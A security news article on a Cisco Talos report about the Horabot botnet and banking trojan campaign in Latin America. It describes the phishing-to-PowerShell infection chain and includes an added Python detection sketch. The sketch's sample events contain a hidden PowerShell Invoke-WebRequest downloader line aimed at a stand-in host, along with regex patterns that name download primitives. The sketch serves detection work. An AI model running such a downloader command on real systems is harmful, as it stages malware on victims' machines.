New Horabot Botnet Campaign Infects User Accounts in Latin America

Researchers suggest that the Brazilian attackers are the primary source of the threat.

Researchers have identified a previously unknown malware campaign involving the Horabot botnet that targets Spanish-speaking users in Latin America. The campaign has reportedly been active since at least November 2020, infecting victims with a banking trojan and a spam tool.

The malware lets attackers take over victims’ Gmail, Outlook, Hotmail or Yahoo accounts, steal mailbox data and two-factor authentication codes, and send phishing emails on the victims’ behalf.

The new Horabot operation was discovered by analysts at Cisco Talos, who believe the threat originates from Brazil.

Delivery to the target device

The multi-stage infection chain begins with a tax-themed phishing email carrying an HTML attachment that purports to be a payment receipt. Opening the HTML file takes the victim to a page hosted on an AWS server controlled by the attackers.



Malicious page hosted on AWS

When the victim clicks a hyperlink on the page, a RAR archive is downloaded; it contains a batch file with a “.cmd” extension. This file launches a PowerShell script that downloads trojan DLLs and a set of legitimate executables from the attackers’ C2 servers. The trojans in turn download two more payloads from another C2 server: a PowerShell script for uploading files, and the Horabot binary.
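The chain above (an archived “.cmd” batch file that launches PowerShell, which then pulls further payloads from the network) is the kind of parent/child process relationship endpoint telemetry can surface. The following detection sketch is an added example, not code from Cisco Talos or from this article: it runs over constructed process-creation events whose field names follow the Sysmon Event ID 1 convention (an assumption), and flags a batch file in a user-writable location spawning PowerShell with a download primitive on its command line. The sample paths, user name and URL are constructed.

```python
import re

# Constructed sample process-creation events (not real telemetry). Field names
# follow the Sysmon Event ID 1 convention; that mapping is an assumption here.
SAMPLE_EVENTS = [
    {   # Modelled on the article's chain: a .cmd extracted from an archive in the
        # user's Temp folder launches a hidden PowerShell that fetches more content.
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\Rar$DIa0.123\recibo_pago.cmd"',
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -Command Invoke-WebRequest -Uri https://example.invalid/x",
    },
    {   # Benign: an administrative script under Program Files asks PowerShell for a timestamp.
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r'cmd.exe /c "C:\Program Files\Backup\nightly.cmd"',
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -Command Get-Date",
    },
    {   # Benign: interactive PowerShell started from Explorer.
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\Explorer.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe",
    },
]

# Locations a user (and therefore a mail attachment or archive extractor) can write to.
USER_WRITABLE_DIR = re.compile(r"\\(AppData\\Local\\Temp|Downloads|INetCache)\\", re.IGNORECASE)
# Batch file referenced on the parent's command line.
BATCH_FILE = re.compile(r"\.(cmd|bat)\b", re.IGNORECASE)
# PowerShell primitives that fetch content from the network.
DOWNLOAD_PRIMITIVE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer", re.IGNORECASE
)


def is_suspicious(event):
    """True when cmd.exe running a batch file from a user-writable directory
    spawns PowerShell whose command line contains a download primitive."""
    parent = event["ParentImage"].lower()
    child = event["Image"].lower()
    if not (parent.endswith("\\cmd.exe") and child.endswith("powershell.exe")):
        return False
    parent_cmdline = event["ParentCommandLine"]
    if not (BATCH_FILE.search(parent_cmdline) and USER_WRITABLE_DIR.search(parent_cmdline)):
        return False
    return bool(DOWNLOAD_PRIMITIVE.search(event["CommandLine"]))


def find_suspicious_chains(events):
    """Return the indices of events matching the batch-file -> PowerShell downloader chain."""
    return [i for i, e in enumerate(events) if is_suspicious(e)]


if __name__ == "__main__":
    for i in find_suspicious_chains(SAMPLE_EVENTS):
        e = SAMPLE_EVENTS[i]
        print(f"[{i}] {e['ParentCommandLine']} -> {e['CommandLine']}")
```

The three conditions are deliberately combined rather than alerted on individually: batch files, PowerShell and web requests are each common in administration, but a batch file dropped in Temp or Downloads that immediately launches a hidden PowerShell downloader is the specific shape of an attachment-delivered stager, so the conjunction keeps the rule quiet on hosts where scripted maintenance runs from protected paths.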

Banking trojan

One of the DLLs in the downloaded ZIP, “jli.dll”, which is loaded by the executable “kinit.exe”, is a banking trojan written in Delphi. It collects information about the victim’s system (language, disk size, antivirus software, hostname, OS version, IP address), as well as user credentials and activity data.

In addition, the Trojan provides its operators with remote access capabilities, such as performing file operations. The malware can also intercept keystrokes, take screenshots, and track mouse movement.

When the victim opens a banking application, or its web version in a browser, the trojan overlays a fake window on top of the login fields to trick the victim into entering sensitive data such as credentials or one-time codes, giving the criminals full access to the bank account.

Cisco explains that the trojan has several built-in anti-analysis mechanisms to prevent it from running inside sandboxes or under a debugger.

The ZIP archive also contains an encrypted spam tool DLL called “_upyqta2_J.mdat” designed to steal credentials for popular webmail services such as Gmail, Hotmail, and Yahoo.

Once credentials are compromised, the tool takes over the victim’s email account, generates spam emails, and sends them to the contacts in the victim’s mailbox, spreading the infection further. This tool can also intercept keystrokes, take screenshots, and log mouse movements.

Horabot botnet

The main payload installed on the victim’s system in this campaign is Horabot, a PowerShell-based botnet that targets Outlook mailboxes to steal contacts and send phishing emails with malicious HTML attachments.

The malware launches the Outlook application on the victim’s desktop to parse the address book and the contacts found in the mailbox contents. “After initialization, the Horabot script looks for Outlook data files from the victim’s profile folder,” explains Cisco. All e-mail addresses extracted by the malware are written to an .Outlook file, encrypted, and transmitted to the attackers.

Finally, the malware creates an HTML file locally, fills it with content fetched from an external resource, and sends phishing emails to each extracted recipient individually. Once the phishing emails have been sent, the locally created files and folders are deleted to erase traces of the program’s activity.

Although this Horabot campaign mainly targets users in Mexico, Uruguay, Brazil, Venezuela, Argentina, Guatemala and Panama, its operators could expand into other markets at any time by using phishing lures written in other languages.

Source: www.securitylab.ru